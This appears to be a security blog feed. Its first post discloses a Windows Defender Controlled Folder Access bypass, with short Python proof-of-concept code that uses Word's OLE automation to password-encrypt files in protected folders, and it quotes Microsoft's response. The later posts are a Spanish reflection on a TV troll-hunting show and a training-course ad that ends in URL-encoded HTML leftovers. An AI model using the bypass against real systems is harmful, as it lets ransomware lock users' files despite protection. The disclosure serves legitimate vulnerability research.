Microsoft Anti Ransomware bypass (not a vulnerability for Microsoft) 31 Jan 2018 12:53 AM (7 years ago)
This new feature uses a granular access control to several folders with the purpose to block changes made from untrusted software.
In the same way than firewalls do with programs that want to make connections (allow/block) Windows Defender uses the same approach to allow/block access to the folders, giving (theoretically) a very good protection to Ransomware attacks.
By default Microsoft has a pre-defined list with the software that is allowed to make changes in protected folders. Users could add new programs that could made changes.
More info about Microsoft Anti Ransomware here
Vulnerability
By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions.
This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically.
So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner.
Consider this python code:
file = open('C:/Users/YJ/Documents/test.docx','w')
file.write('Random text.')
file.close()
It tries to open a file located in a protected folder (Documents) to write it
If you try to use it with Defender ransomware protection activated they raise an error and access is denied because Python.exe is not allowed to make changes in the protected folder
But this python code:
import win32com.client
filetoberansom = r'C:/Users/YJ/Documents/test.docx'
word = win32com.client.Dispatch("Word.Application")
word.visible = 0
doc = word.Documents.Open(filetoberansom)
word.Documents.Item(1).Password= '12345678'
word.Documents.Item(1).Save()
word.Documents.Item(1).Close()
word.Application.Quit()
Do the magic !
- open the file
- encrypt it with password 12345678 (using native Office Document protection)
- save it
Why ? Because this code uses OLE Word Object to do the work, so in fact is Word who is doing the job :)
Using this technique an attacker could perform a Ransomware attack bypassing Windows Defender protection activating the native encryption feature of Microsoft Office.
In a environment with Office+Windows (the most common) Microsoft Anti Ransom is totally useless
Another possibility is:
- Using Selection.Copy method to copy the content of a protected file
- Using Selection.Paste to put the content in another file outside protected folders
- Then delete content of the original file or put a Ransomware note
- Encrypt the new file as ransomware does
Microsoft answer
I have notified to Microsoft on 23 January and on 31 I got this response
The most relevant part is:
We aren't classifying this as a security vulnerability because Defender Exploit Guard isn't meant to be a security boundary
But if you read this Microsoft defines Exploit guard as 'Windows system and application exploit mitigations using Windows Defender Exploit Guard (WDEG)'
Also relevant
'Instead, we will address this through an improvement to the Controlled Folder Access functionality'
That really means Microsoft will fix the vulnerability that should be clasified as Mitigation bypass without acknowledgment
Reflexiones personales sobre #cazadoresdetrolls 29 Mar 2017 3:34 AM (8 years ago)
Sin duda, una de las comidillas de la semana en el sector ha sido el programa "Cazadores de Trolls" que emitió anoche la Sexta.
Recuerdo que a finales de 2015, recibí una llamada de parte de una tal Julieta, que representaba a Pedro Aguado y que buscaban una persona que pudiera colaborar con ellos para ayudar ante situaciones de acoso en redes sociales e Internet, como la de anoche, en las que las víctimas denunciaban y no "se les solucionaba el problema", o simplemente no denunciaban y buscaban identificar a los acosadores. Por aquella época me encontraba en Latinoamérica y no pude contestar personalmente, pero el mensaje que se me transmitió fue ese.
La misma información la recibimos en la cuenta de contacto del blog, a través de ANCITE,... y lo comentamos entre varios colegas del sector, en los que curiosamente todos habíamos sido "elegidos".
La forma en la que lo planteaban sonaba francamente complicada. Había cosas que "habría que hacer" que claramente eran ilegales, y nadie quiere meterse en ese tipo de líos, aparte de ir contra la ética personal de cada uno.
Estaba claro que querían un Reality, y por lo que me contaron otros compañeros que sí que devolvieron la llamada, cuando les planteaban la legalidad de las cosas, contestaban que tenían un equipo de abogados que dirían lo que se puede y lo que no se puede hacer.
Finalmente, cuando se publicó que el programa iba a emitirse, reconozco que mi principal curiosidad era el saber quién se habría prestado a ello, y qué habría permitido y qué no.
Cuando ví que finalmente el elegido (o mejor dicho el que les eligió a ellos) era Enrique Serrano, pensé que el contenido estaría bien hecho, puesto que lo que conozco de él es un buen profesional.
Quiero dejar claro varias cosas:
- Por una parte, la actuación ante el caso de Luisa, en el que si quieres ceñirte a la legalidad de lo que puedes y lo que no puedes emitir en público, y sobre todo sin herramientas que puedan tener las FCSE (cuando tienen una orden judicial que así lo autorice) a la hora de solicitar a Twitter direcciones IP de la actividad de un perfil, a las páginas web desde las que se crean los anuncios falsos, etc,... lo que hizo Enrique no es una mala forma de enfocarlo. Realmente, es que no se me ocurren muchas más. Obviamente, es ilegal comprometer el ordenador del troll en base a que abra un enlace o descargue un fichero con algún veneno, por lo que, si el objetivo es publicarlo en TV, esas acciones quedan descartadas de antemano. En este punto, me parece que las acciones de Enrique, y que lo mostrado haya sido o no real, no son un mal camino.
- Sobre la puesta en escena, pues está claro: Es televisión. No "mola" lo mismo que todo esto se haga desde una casa o una oficina, que montar un atrezzo en una furgoneta con papeles por los cristales en los que parezca que estás haciendo algo fraudulento/ilegal/oscuro/oculto... y por qué no decirlo "de hackers". En varias ocasiones han venido periodistas de diferentes cadenas a las oficinas de Securízame, a grabar para algún reportaje, un telediario u otros programas, y una de las cosas que te piden es que tengas algún fondo con algo relacionado. En mi caso suelo poner un top en un sistema Linux o la GUI de Snort y que se vean alertas de colores saliendo, y así todos contentos.
- El montaje: Este sin duda es el mayor de los miedos que tienes cuando te han grabado durante media hora hablando (o dos horas como me pasó el otro día), y el producto final mostrado al televidente, que durará 10 segundos si estamos hablando de un noticiero, o como mucho dos minutos en el caso de un reportaje, en los que quienes llevan a cabo este trabajo, generalmente buscan una frase, una afirmación o algo que hayas dicho que resuma todo lo anterior. El problema es que generalmente, si no se ha visto lo anterior, lo que se emite está fuera de contexto, y quien no se ha pegado todo el tiempo grabando contigo, puede llegar a decir: ¿En serio Lorenzo ha dicho esto? Pero ojo que esto también te puede pasar cuando te llegan preguntas para una entrevista en un medio escrito o de radio. De hecho, en más de una ocasión he aprovechado el blog para publicar la entrevista completa o lo que realmente quise haber podido decir en un programa, y que generalmente por limitaciones de tiempo no se ha podido, sobre todo con la finalidad de que quien haya visto un programa o leído una entrevista, no se queden con unas declaraciones que se puedan calificar de poco técnicas o rigurosas, puesto que al estar destinadas a un público generalista y no-técnico, te tienes que esmerar en explicarlo de forma muy sencilla, pero sin perder el rigor de lo que dices. Y creedme: NO es fácil hacerlo.
- Sobre la legalidad de lo que te piden: En general, las peticiones de apariciones en medios que me llegan son para dar una opinión técnica (dentro de lo que se puede) sobre alguna noticia que afecte a la seguridad o privacidad de las personas, como pueden ser filtraciones de credenciales, de datos personales, o que supongan algún riesgo como el IoT, o algo explicativo como puede ser la utilización de TOR.
Casos reales
Sin embargo, también me han pedido "cosas raras". En navidades me contactaron de un programa bastante conocido en relación al informe sobre riesgos de uso de Whatsapp que emitió el CCN-CERT, en los que, a ojos de la periodista con la que hablé, era algo francamente aterrador y peligroso. Tras leerlo detenidamente, ví cosas francamente normales y de sentido común. La no utilización del mismo conectado a redes inalámbricas públicas y no confiables, la abstinencia de comunicación de información confidencial a través del mismo, etc... Punto por punto se lo manifesté a la periodista, y me dijo que si no era capaz de salir en TV diciendo que podía "hackear" una comunicación de cualquier whatsapp, que entonces "ya me llamarían". Obviamente les dije que no, que ahora el cifrado iba extremo a extremo, y que a día de hoy, no tenía conocimiento de que se pudiera hacer. Tiempo después se emitió el programa y quise ver esa parte, en la que salía una persona que decían que mostraría lo inseguro del protocolo porque lo iba a "hackear". Básicamente lo que hacía era comprometer un terminal Android con un spyware y obviamente accedía a las conversaciones de whatsapp, pero si quisiera también a todo el contenido del dispositivo... Normal! Pero, para mí, eso NO es interceptar cualquier whatsapp.
En otra ocasión me contactaron de un informativo para hablar de la inseguridad de tener cámaras de CCTV cuya administración estuviese expuesta hacia Internet (esta descripción es la que yo doy, pero a mi me dijeron algo menos entendible). Les dije que no había ningún problema en hablar de ello, así como de dar diferentes consejos para mejorar la seguridad de esas acciones, y así concienciar al público evitando en la medida de lo posible que les puedan comprometer. Directamente me dijeron: ¿Entonces, podrás "hackear" las cámaras de una empresa en vivo y que nosotros lo grabemos?. Atónito, mi respuesta fue: "Ehm... lo que me pides no se puede hacer porque es ilegal". "Lo que sí que puedo hacer es mostrar diversas tecnologías de cámaras accesibles desde Internet [pensando en búsquedas en Shodan básicamente], y luego acceder al panel de las de mi empresa, para las que obviamente estoy autorizado, de manera que nadie nos pueda denunciar por ello". A esto me contestó la periodista que si no era posible que hackeara la de otra empresa en vivo, no les interesaba porque se lo habían pedido así. Obviamente, tampoco accedí a ello.
Conclusiones
No quiero justificar que lo que han publicado en Cazadores de Trolls esté bien o mal, que sea verdad o un fake, ni que le pongan más o menos salsa para que el programa sea atractivo hacia un público generalista.
Respeto la decisión de Enrique a que se haya prestado a salir en el programa, aunque personalmente creo que era un jardín en el que muchas personas de la comunidad vimos, por las formas iniciales y el contenido, que no iba a ser algo que fuese a resultar sencillo y preferimos no prestarnos a ello.
Próximos eventos de formación presencial de seguridad en Securízame 16 Feb 2017 8:32 PM (8 years ago)
A lo largo de 2017, en Securízame, hemos ido planificando un buen calendario de capacitaciones presenciales en la academia de nuestras instalaciones en Madrid. Así, hemos impartido dos sesiones de Gestión y Respuesta ante Incidentes en GNU/Linux, que han aportado un muy buen feedback por parte de los alumnos.
26, 27 y 28 de Mayo de 2017: DFIR y Análisis Forense en Windows (8 plazas disponibles a la fecha)
Como complemento al curso de Gestión de Respuesta ante Incidentes y Análisis Forense de Linux, surge este otro curso con el mismo objetivo para Windows. Preparar al alumno para que sea capaz de enfrentarse ante un incidente de seguridad, pero en este caso en el que las víctimas sean ordenadores con sistema operativo Windows.
En la misma línea, se entregará una imagen para un USB de Incident Response con herramientas para Windows, que utilizamos en Securízame para cuando nos toca hacer este tipo de actuaciones. Asimismo se detallarán los diferentes artifacts y elementos del sistema operativo, susceptibles de contener información valiosa en un incidente o a la hora de realizar un peritaje informático forense en Windows.
Los profesores que estaremos encargados de llevar a cabo esta formación somos Pedro Sánchez Cordero y yo (Lorenzo Martínez Rodríguez), que contamos con amplia experiencia en impartir este curso a diferentes empresas y organizaciones, de forma conjunta, con muy buenos resultados.
Tienes la información y acceso al registro de este entrenamiento en este enlace: DFIR y Análisis Forense en Windows.
Las plazas, son limitadas a 20 alumnos, y en general un alto porcentaje de ellas suelen ser ocupadas por antiguos alumnos a los que, por su fidelidad, les enviamos la información para acceso al curso 24 horas antes de que el acceso sea público. De hecho, primera edición de este curso, planificada para el 5, 6 y 7 de Mayo, ya se llenó, y es por eso que tuvimos que abrir una nueva.
Aunque te parezca que algunas fechas están muy lejos en el calendario, no te descuides porque se suelen llenar pronto.
En caso que no puedas asistir a nuestras formaciones por no encajarte las fechas o por la distancia a Madrid, tienes alternativas online en https://cursos.securizame.com/cursos, que no están sujetas a ningún tipo de agenda, puesto que se trata de cursos pre-grabados. Esto significa que si quieres hacer cualquiera de los cursos que están disponibles en la página, simplemente te registras, efectúas el pago del mismo y te generamos todo el material de forma personalizada.
Si tienes cualquier duda, o requieres más información respecto a alguna de los cursos o el entrenamiento, puedes contactar con nosotros a través del formulario en https://www.securizame.com/contacto
%26nbsp;%3C/b%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cb%3E%3Cbr%20/%3E%3C/b%3E%3C/div%3E%0A%3Cdiv%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Ca%20href%3D%22https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLxjZudmr6oD_WmtMvSlylNuEUCm4CWD2AK_6_B8qJFf5XiYzKjyhT9bjuS40JvnOheruvy4gJJqXUmL0UsoJb2tfS8FuRkfNjxvKZV8tin4vtJYgt-XCE6oOvVtXBeNI2TsyuKK5tD70/s1600/Segunda-edicion-Windows.jpg%22%20imageanchor%3D%221%22%3E%3Cimg%20border%3D%220%22%20height%3D%22265%22%20src%3D%22https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLxjZudmr6oD_WmtMvSlylNuEUCm4CWD2AK_6_B8qJFf5XiYzKjyhT9bjuS40JvnOheruvy4gJJqXUmL0UsoJb2tfS8FuRkfNjxvKZV8tin4vtJYgt-XCE6oOvVtXBeNI2TsyuKK5tD70/s400/Segunda-edicion-Windows.jpg%22%20width%3D%22400%22%20/%3E%3C/a%3E%3C/div%3E%0A%3Cdiv%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0AComo%20complemento%20al%20curso%20de%20%3Ca%20href%3D%22https://www.securizame.com/curso-presencial-dfir-y-analisis-forense-en-gnulinux-10-horas-segunda-edicion/%22%3EGesti%C3%B3n%20de%20Respuesta%20ante%20Incidentes%20y%20An%C3%A1lisis%20Forense%20de%20Linux%3C/a%3E,%20surge%20este%20otro%20curso%20con%20el%20mismo%20objetivo%20para%20Windows.%20Preparar%20al%20alumno%20para%20que%20sea%20capaz%20de%20enfrentarse%20ante%20un%20incidente%20de%20seguridad,%20pero%20en%20este%20caso%20en%20el%20que%20las%20v%C3%ADctimas%20sean%20ordenadores%20con%20sistema%20operativo%20Windows.%3C/div%3E%0A%3Cbr%20/%3E%0A%3Cdiv%3E%0AEn%20la%20misma%20l%C3%ADnea,%20se%20entregar%C3%A1%20una%20imagen%20para%20un%20USB%20de%20Incident%20Response%20con%20herramientas%20para%20Windows,%20que%20utilizamos%20en%20Secur%C3%ADzame%20para%20cuando%20nos%20toca%20hacer%20este%20tipo%20de%20actuaciones.%20Asimismo%20se%20detallar%C3%A1n%20los%20diferentes%20artifacts%20y%20elementos%20del%20sistema%20operativo,%20susceptibles%20de%20contener%20informaci%C3%B3n%20valiosa%20en%20un%20incidente%20o%20a%20la%20hora%20de%20realizar%20un%20peritaje%20inform%C3%A1tico%20forense%20en%20Windows.%3C/div%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0ALos%20profesores%20que%20estaremos%20encargados%20de%20llevar%20a%20cabo%20esta%20formaci%C3%B3n%20somos%20%3Ca%20href%3D%22http://www.twitter.com/conexioninversa%22%3EPedro%20S%C3%A1nchez%20Cordero%3C/a%3E%20y%20yo%20(%3Ca%20href%3D%22http://www.twitter.com/lawwait%22%3ELorenzo%20Mart%C3%ADnez%20Rodr%C3%ADguez%3C/a%3E),%20que%20contamos%20con%20amplia%20experiencia%20en%20impartir%20este%20curso%20a%20diferentes%20empresas%20y%20organizaciones,%20de%20forma%20conjunta,%20con%20muy%20buenos%20resultados.%26nbsp;%20%26nbsp;%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0ATienes%20la%20informaci%C3%B3n%20y%20acceso%20al%20registro%20de%20este%20entrenamiento%20en%20este%20enlace:%26nbsp;%3Cb%3E%3Ca%20href%3D%22https://www.securizame.com/curso-presencial-dfir-analisis-forense-windows-segunda-edicion-peritaje/%22%3EDFIR%20y%20An%C3%A1lisis%20Forense%20en%20Windows%3C/a%3E.%3C/b%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0ALas%20plazas,%20son%20limitadas%20a%2020%20alumnos,%20y%20en%20general%20un%20alto%20porcentaje%20de%20ellas%20suelen%20ser%20ocupadas%20por%20antiguos%20alumnos%20a%20los%20que,%20por%20su%20fidelidad,%20les%20enviamos%20la%20informaci%C3%B3n%20para%20acceso%20al%20curso%2024%20horas%20antes%20de%20que%20el%20acceso%20sea%20p%C3%BAblico.%20De%20hecho,%20primera%20edici%C3%B3n%20de%20este%20curso,%20planificada%20para%20el%205,%206%20y%207%20de%20Mayo,%20ya%20se%20llen%C3%B3,%20y%20es%20por%20eso%20que%20tuvimos%20que%20abrir%20una%20nueva.%3C/div%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3Cdiv%3E%0AAunque%20te%20parezca%20que%20algunas%20fechas%20est%C3%A1n%20muy%20lejos%20en%20el%20calendario,%20no%20te%20descuides%20porque%20se%20suelen%20llenar%20pronto.%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0AEn%20caso%20que%20no%20puedas%20asistir%20a%20nuestras%20formaciones%20por%20no%20encajarte%20las%20fechas%20o%20por%20la%20distancia%20a%20Madrid,%20tienes%20alternativas%20online%20en%20%3Ca%20href%3D%22https://cursos.securizame.com/cursos%22%3Ehttps://cursos.securizame.com/cursos%3C/a%3E,%20que%20no%20est%C3%A1n%20sujetas%20a%20ning%C3%BAn%20tipo%20de%20agenda,%20puesto%20que%20se%20trata%20de%20cursos%20pre-grabados.%20Esto%20significa%20que%20si%20quieres%20hacer%20cualquiera%20de%20los%20cursos%20que%20est%C3%A1n%20disponibles%20en%20la%20p%C3%A1gina,%20simplemente%20te%20registras,%20efect%C3%BAas%20el%20pago%20del%20mismo%20y%20te%20generamos%20todo%20el%20material%20de%20forma%20personalizada.%26nbsp;%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0ASi%20tienes%20cualquier%20duda,%20o%20requieres%20m%C3%A1s%20informaci%C3%B3n%20respecto%20a%20alguna%20de%20los%20cursos%20o%20el%20entrenamiento,%20puedes%20contactar%20con%20nosotros%20a%20trav%C3%A9s%20del%20formulario%20en%20%3Ca%20href%3D%22https://www.securizame.com/contacto%22%3E%3Cb%3Ehttps://www.securizame.com/contacto%3C/b%3E%3C/a%3E%3C/div%3E%0A%3C/div%3E%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%3Cbr%20/%3E%0A%3Cdiv%3E%0A%3Cdiv%3E%0A%3Cbr%20/%3E%3C/div%3E%0A%3C/div%3E)